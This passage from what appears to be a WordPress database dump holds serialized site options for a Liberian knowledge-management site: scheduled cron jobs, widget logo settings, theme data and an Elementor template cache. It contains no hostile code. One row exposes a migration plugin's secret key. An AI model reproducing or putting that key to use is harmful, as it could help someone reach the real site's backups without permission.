interval\";i:86400;}}}i:1782117682;a:1:{s:21:\"wp_update_user_counts\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1782120768;a:1:{s:29:\"jetpack_waf_rules_update_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1782122039;a:1:{s:21:\"ai1wm_storage_cleanup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1782122251;a:1:{s:28:\"elementor/tracker/send_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1782124068;a:1:{s:20:\"jetpack_v2_heartbeat\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1782124194;a:1:{s:24:\"jp_purge_transients_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1782131655;a:1:{s:18:\"wsm_dailyScheduler\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1782133315;a:1:{s:24:\"akismet_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1782134773;a:2:{s:24:\"tribe_common_log_cleanup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:16:\"tribe_daily_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1782135678;a:1:{s:33:\"fs_data_sync_ocean-social-sharing\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1782146639;a:2:{s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1782146640;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1782155540;a:1:{s:32:\"fs_data_sync_ocean-cookie-notice\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1782169843;a:1:{s:31:\"fs_data_sync_ocean-modal-window\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1782170853;a:1:{s:30:\"fs_data_sync_ocean-white-label\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1782172799;a:2:{s:21:\"schedule_report_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:21:\"schedule_daily_report\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1782172950;a:1:{s:31:\"fs_data_sync_ocean-posts-slider\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1782172974;a:1:{s:16:\"pvc_reset_counts\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:27:\"post_views_counter_interval\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1782177708;a:1:{s:30:\"fs_data_sync_ocean-popup-login\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1782179195;a:1:{s:32:\"fs_data_sync_ocean-sticky-header\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1782180000;a:1:{s:26:\"wpca/cache_condition_types\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1782186918;a:1:{s:36:\"fs_data_sync_ocean-elementor-widgets\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1782186985;a:1:{s:26:\"everest_forms_cleanup_logs\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1782189839;a:1:{s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1782189876;a:2:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:25:\"delete_expired_transients\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1782189878;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1782306733;a:1:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1782423668;a:1:{s:30:\"wp_delete_temp_updater_backups\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1782439725;a:1:{s:30:\"bit_social_send_tracking_event\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1782665548;a:1:{s:35:\"monsterinsights_usage_tracking_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1783245217;a:1:{s:39:\"everest_forms_biweekly_scheduled_events\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:8:\"biweekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:1296000;}}}s:7:\"version\";i:2;}','on'),(5301286,'ai1wm_secret_key','gNMFCJShxeBv','auto'),(103,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(104,'widget_calendar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(105,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(106,'widget_media_image','a:22:{i:2;a:15:{s:4:\"size\";s:6:\"medium\";s:5:\"width\";i:960;s:6:\"height\";i:960;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:0:\"\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";s:13:\"attachment_id\";i:2109;s:3:\"url\";s:72:\"https://ekmsliberia.info/wp-content/uploads/2019/11/epa-logo-300x300.png\";s:5:\"title\";s:0:\"\";}i:3;a:15:{s:4:\"size\";s:6:\"medium\";s:5:\"width\";i:654;s:6:\"height\";i:683;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:0:\"\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";s:13:\"attachment_id\";i:2180;s:3:\"url\";s:72:\"https://ekmsliberia.info/wp-content/uploads/2019/11/fda_logo-287x300.png\";s:5:\"title\";s:0:\"\";}i:4;a:15:{s:4:\"size\";s:4:\"full\";s:5:\"width\";i:262;s:6:\"height\";i:192;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:0:\"\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";s:13:\"attachment_id\";i:2182;s:3:\"url\";s:64:\"https://ekmsliberia.info/wp-content/uploads/2019/11/moa_logo.png\";s:5:\"title\";s:0:\"\";}i:5;a:15:{s:4:\"size\";s:4:\"full\";s:5:\"width\";i:225;s:6:\"height\";i:225;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:0:\"\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";s:13:\"attachment_id\";i:2232;s:3:\"url\";s:63:\"https://ekmsliberia.info/wp-content/uploads/2019/11/ci_logo.png\";s:5:\"title\";s:0:\"\";}i:6;a:15:{s:4:\"size\";s:4:\"full\";s:5:\"width\";i:222;s:6:\"height\";i:227;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:0:\"\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";s:13:\"attachment_id\";i:2233;s:3:\"url\";s:65:\"https://ekmsliberia.info/wp-content/uploads/2019/11/ffi_-logo.png\";s:5:\"title\";s:0:\"\";}i:7;a:15:{s:4:\"size\";s:4:\"full\";s:5:\"width\";i:200;s:6:\"height\";i:196;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:0:\"\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";s:13:\"attachment_id\";i:2234;s:3:\"url\";s:64:\"https://ekmsliberia.info/wp-content/uploads/2019/11/mpw_logo.png\";s:5:\"title\";s:0:\"\";}i:8;a:15:{s:4:\"size\";s:4:\"full\";s:5:\"width\";i:285;s:6:\"height\";i:250;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:0:\"\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";s:13:\"attachment_id\";i:2697;s:3:\"url\";s:65:\"https://ekmsliberia.info/wp-content/uploads/2019/11/nfaa_logo.png\";s:5:\"title\";s:0:\"\";}i:9;a:15:{s:4:\"size\";s:4:\"full\";s:5:\"width\";i:200;s:6:\"height\";i:200;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:0:\"\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";s:13:\"attachment_id\";i:2282;s:3:\"url\";s:64:\"https://ekmsliberia.info/wp-content/uploads/2019/11/laa_logo.png\";s:5:\"title\";s:0:\"\";}i:11;a:15:{s:4:\"size\";s:4:\"full\";s:5:\"width\";i:244;s:6:\"height\";i:236;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:0:\"\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";s:13:\"attachment_id\";i:2469;s:3:\"url\";s:73:\"https://ekmsliberia.info/wp-content/uploads/2019/11/wash_liberia_logo.png\";s:5:\"title\";s:0:\"\";}i:12;a:15:{s:4:\"size\";s:4:\"full\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:0:\"\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";s:13:\"attachment_id\";i:2472;s:3:\"url\";s:67:\"https://ekmsliberia.info/wp-content/uploads/2019/11/lisgis_logo.png\";s:5:\"title\";s:0:\"\";}i:13;a:15:{s:4:\"size\";s:4:\"full\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:0:\"\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";s:13:\"attachment_id\";i:2604;s:3:\"url\";s:63:\"https://ekmsliberia.info/wp-content/uploads/2019/11/lgslogo.jpg\";s:5:\"title\";s:0:\"\";}i:14;a:15:{s:4:\"size\";s:4:\"full\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:9:\"link_type\";s:4:\"none\";s:8:\"link_url\";s:0:\"\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";s:13:\"attachment_id\";i:2667;s:3:\"url\";s:64:\"https://ekmsliberia.info/wp-content/uploads/2019/11/lla_logo.png\";s:5:\"title\";s:0:\"\";}i:15;a:15:{s:4:\"size\";s:4:\"full\";s:5:\"width\";i:200;s:6:\"height\";i:197;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:0:\"\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";s:13:\"attachment_id\";i:2672;s:3:\"url\";s:64:\"https://ekmsliberia.info/wp-content/uploads/2019/11/mia_logo.png\";s:5:\"title\";s:0:\"\";}i:16;a:15:{s:4:\"size\";s:4:\"full\";s:5:\"width\";i:284;s:6:\"height\";i:200;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:0:\"\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";s:13:\"attachment_id\";i:2677;s:3:\"url\";s:64:\"https://ekmsliberia.info/wp-content/uploads/2019/11/lma_logo.png\";s:5:\"title\";s:0:\"\";}i:17;a:15:{s:4:\"size\";s:6:\"medium\";s:5:\"width\";i:0;s:6:\"height\";i:0;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:0:\"\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";s:13:\"attachment_id\";i:0;s:3:\"url\";s:0:\"\";s:5:\"title\";s:0:\"\";}i:18;a:15:{s:4:\"size\";s:4:\"full\";s:5:\"width\";i:197;s:6:\"height\";i:197;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:0:\"\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";s:13:\"attachment_id\";i:2683;s:3:\"url\";s:64:\"https://ekmsliberia.info/wp-content/uploads/2019/11/mot_logo.png\";s:5:\"title\";s:0:\"\";}i:19;a:15:{s:4:\"size\";s:4:\"full\";s:5:\"width\";i:285;s:6:\"height\";i:259;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:0:\"\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";s:13:\"attachment_id\";i:2693;s:3:\"url\";s:65:\"https://ekmsliberia.info/wp-content/uploads/2019/11/cari_logo.png\";s:5:\"title\";s:0:\"\";}i:20;a:15:{s:4:\"size\";s:6:\"medium\";s:5:\"width\";i:0;s:6:\"height\";i:0;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:0:\"\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";s:13:\"attachment_id\";i:0;s:3:\"url\";s:0:\"\";s:5:\"title\";s:0:\"\";}i:21;a:15:{s:4:\"size\";s:4:\"full\";s:5:\"width\";i:200;s:6:\"height\";i:165;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:0:\"\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";s:13:\"attachment_id\";i:2701;s:3:\"url\";s:67:\"https://ekmsliberia.info/wp-content/uploads/2019/11/mogcsp_logo.png\";s:5:\"title\";s:0:\"\";}i:22;a:15:{s:4:\"size\";s:4:\"full\";s:5:\"width\";i:225;s:6:\"height\";i:225;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:0:\"\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";s:13:\"attachment_id\";i:2711;s:3:\"url\";s:65:\"https://ekmsliberia.info/wp-content/uploads/2019/11/mfdp_logo.jpg\";s:5:\"title\";s:0:\"\";}i:23;a:15:{s:4:\"size\";s:4:\"full\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:7:\"caption\";s:0:\"\";s:3:\"alt\";s:0:\"\";s:9:\"link_type\";s:6:\"custom\";s:8:\"link_url\";s:0:\"\";s:13:\"image_classes\";s:0:\"\";s:12:\"link_classes\";s:0:\"\";s:8:\"link_rel\";s:0:\"\";s:17:\"link_target_blank\";b:0;s:11:\"image_title\";s:0:\"\";s:13:\"attachment_id\";i:2781;s:3:\"url\";s:81:\"https://ekmsliberia.info/wp-content/uploads/2019/11/SCNL_Liberia_Logo-150x150.png\";s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(107,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(108,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(109,'widget_tag_cloud','a:2:{i:2;a:3:{s:5:\"title\";s:4:\"Tags\";s:5:\"count\";i:1;s:8:\"taxonomy\";s:12:\"resource_tag\";}s:12:\"_multiwidget\";i:1;}','yes'),(110,'widget_nav_menu','a:3:{i:2;a:2:{s:5:\"title\";s:9:\"This Site\";s:8:\"nav_menu\";i:122;}i:3;a:2:{s:5:\"title\";s:5:\"Links\";s:8:\"nav_menu\";i:120;}s:12:\"_multiwidget\";i:1;}','yes'),(111,'widget_custom_html','a:2:{i:3;a:2:{s:5:\"title\";s:18:\"EKMS Learning Zone\";s:7:\"content\";s:106:\"<p>\r\nHere you can access Powerpoint Presentations on Knowledge Management.\r\n</p>\r\n<p>\r\n	Coming soon!\r\n</p>\";}s:12:\"_multiwidget\";i:1;}','yes'),(113,'recovery_keys','a:0:{}','off'),(115,'theme_mods_twentynineteen','a:2:{s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1573188726;s:4:\"data\";a:2:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}}}}','off'),(124,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:24:\"contact@ekmsliberia.info\";s:7:\"version\";s:5:\"6.9.4\";s:9:\"timestamp\";i:1773247478;}','off'),(136,'recently_activated','a:0:{}','off'),(153,'elementor_version','3.7.8','yes'),(155,'_elementor_installed_time','1573188662','yes'),(156,'elementor_remote_info_library','a:3:{s:10:\"types_data\";a:4:{s:5:\"block\";a:2:{s:10:\"categories\";a:30:{i:0;s:8:\"404 page\";i:1;s:5:\"about\";i:2;s:7:\"archive\";i:3;s:8:\"Benefits\";i:4;s:14:\"call to action\";i:5;s:7:\"clients\";i:6;s:7:\"contact\";i:7;s:4:\"Data\";i:8;s:10:\"ehp-footer\";i:9;s:10:\"ehp-header\";i:10;s:3:\"faq\";i:11;s:8:\"features\";i:12;s:6:\"footer\";i:13;s:7:\"Gallery\";i:14;s:6:\"header\";i:15;s:4:\"hero\";i:16;s:11:\"Link in Bio\";i:17;s:9:\"portfolio\";i:18;s:7:\"pricing\";i:19;s:15:\"product archive\";i:20;s:5:\"Quote\";i:21;s:15:\"Service Details\";i:22;s:8:\"services\";i:23;s:11:\"single page\";i:24;s:11:\"single post\";i:25;s:14:\"single product\";i:26;s:5:\"stats\";i:27;s:9:\"subscribe\";i:28;s:4:\"team\";i:29;s:12:\"testimonials\";}s:4:\"sets\";a:5:{i:0;s:11:\"Boxing Club\";i:1;s:19:\"Business Consultant\";i:2;s:16:\"Marketing Agency\";i:3;s:9:\"Wireframe\";i:4;s:15:\"Workshop Center\";}}s:5:\"popup\";a:1:{s:10:\"categories\";a:6:{i:0;s:10:\"bottom bar\";i:1;s:7:\"classic\";i:2;s:6:\"fly-in\";i:3;s:11:\"full screen\";i:4;s:9:\"hello bar\";i:5;s:8:\"slide-in\";}}s:2:\"lp\";a:1:{s:10:\"categories\";a:15:{i:0;s:8:\"Business\";i:1;s:16:\"Coming Soon Page\";i:2;s:9:\"eCommerce\";i:3;s:9:\"Education\";i:4;s:6:\"Events\";i:5;s:18:\"Health and Fitness\";i:6;s:3:\"NFT\";i:7;s:14:\"Online Service\";i:8;s:7:\"Product\";i:9;s:11:\"Real Estate\";i:10;s:18:\"Social Involvement\";i:11;s:14:\"Thank You Page\";i:12;s:6:\"Travel\";i:13;s:18:\"Under Construction\";i:14;s:9:\"Wireframe\";}}s:2:\"lb\";a:1:{s:10:\"categories\";a:2:{i:0;s:4:\"post\";i:1;s:7:\"product\";}}}s:10:\"categories\";a:30:{i:0;s:8:\"404 page\";i:1;s:5:\"about\";i:2;s:7:\"archive\";i:3;s:8:\"Benefits\";i:4;s:14:\"call to action\";i:5;s:7:\"clients\";i:6;s:7:\"contact\";i:7;s:4:\"Data\";i:8;s:10:\"ehp-footer\";i:9;s:10:\"ehp-header\";i:10;s:3:\"faq\";i:11;s:8:\"features\";i:12;s:6:\"footer\";i:13;s:7:\"Gallery\";i:14;s:6:\"header\";i:15;s:4:\"hero\";i:16;s:11:\"Link in Bio\";i:17;s:9:\"portfolio\";i:18;s:7:\"pricing\";i:19;s:15:\"product archive\";i:20;s:5:\"Quote\";i:21;s:15:\"Service Details\";i:22;s:8:\"services\";i:23;s:11:\"single page\";i:24;s:11:\"single post\";i:25;s:14:\"single product\";i:26;s:5:\"stats\";i:27;s:9:\"subscribe\";i:28;s:4:\"team\";i:29;s:12:\"testimonials\";}s:9:\"templates\";a:823:{i:0;a:21:{s:4:\"tmpl\";i:1280;s:2:\"id\";i:22403;s:5:\"title\";s:40:\"Hello Bar | Subscribe | Aesthetic Clinic\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/03/aesthetic-clinic-19.jpg\";s:12:\"tmpl_created\";i:1647354307;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:142:\"https://library.elementor.com/popups/hello-bar-subscribe-aesthetic-clinic/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:48:\"[\"Barbershop\",\"Business\",\"Discount\",\"Marketing\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:1;a:21:{s:4:\"tmpl\";i:1281;s:2:\"id\";i:22410;s:5:\"title\";s:32:\"Fly-In | Discount | Hair Stylist\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2022/03/hair-stylist-20.jpg\";s:12:\"tmpl_created\";i:1647354614;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/fly-in-discount-hair-stylist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:32:\"[\"Barbershop\",\"Discount\",\"Hair\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:2;a:21:{s:4:\"tmpl\";i:1285;s:2:\"id\";i:22440;s:5:\"title\";s:32:\"Classic | Subscribe | Shoe 